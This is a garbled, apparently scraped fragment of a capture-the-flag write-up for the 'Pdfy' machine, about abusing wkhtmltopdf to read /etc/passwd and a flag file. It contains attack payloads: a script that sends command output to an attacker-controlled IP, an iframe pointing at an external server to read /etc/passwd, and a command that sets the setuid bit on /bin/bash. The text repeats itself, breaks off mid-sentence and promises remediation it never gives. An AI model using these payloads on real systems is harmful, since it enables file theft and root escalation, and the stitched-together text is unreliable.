There are several effective ways to craft the malicious HTML page. All of them achieve the same goal: forcing wkhtmltopdf to read the /etc/passwd file. Here are three reliable methods.
The Pdfy machine highlights the critical security risks associated with server-side document generation utilities. pdfy htb writeup upd
Change the file:///etc/passwd path to file:///flag.txt in your exploit.php file and rerun the request to retrieve the flag. Remediation Strategies To secure against this attack, implement the following: There are several effective ways to craft the
<script> document.write('<img src="http://your-ip:4444/?c=' + require('child_process').execSync('id') + '">'); </script> implement the following: <
# Define the malicious file contents malicious_file = "JVBERi0xLjMK…(%PDF-1.3)…"
<!DOCTYPE html> <html> <body> <iframe src="http://our-server.com/axura.php?x=/etc/passwd" height="1000px" width="1000px"></iframe> </body> </html>
"converter": "command": "/usr/bin/python -c 'import os; os.system(\"chmod +s /bin/bash\")'"
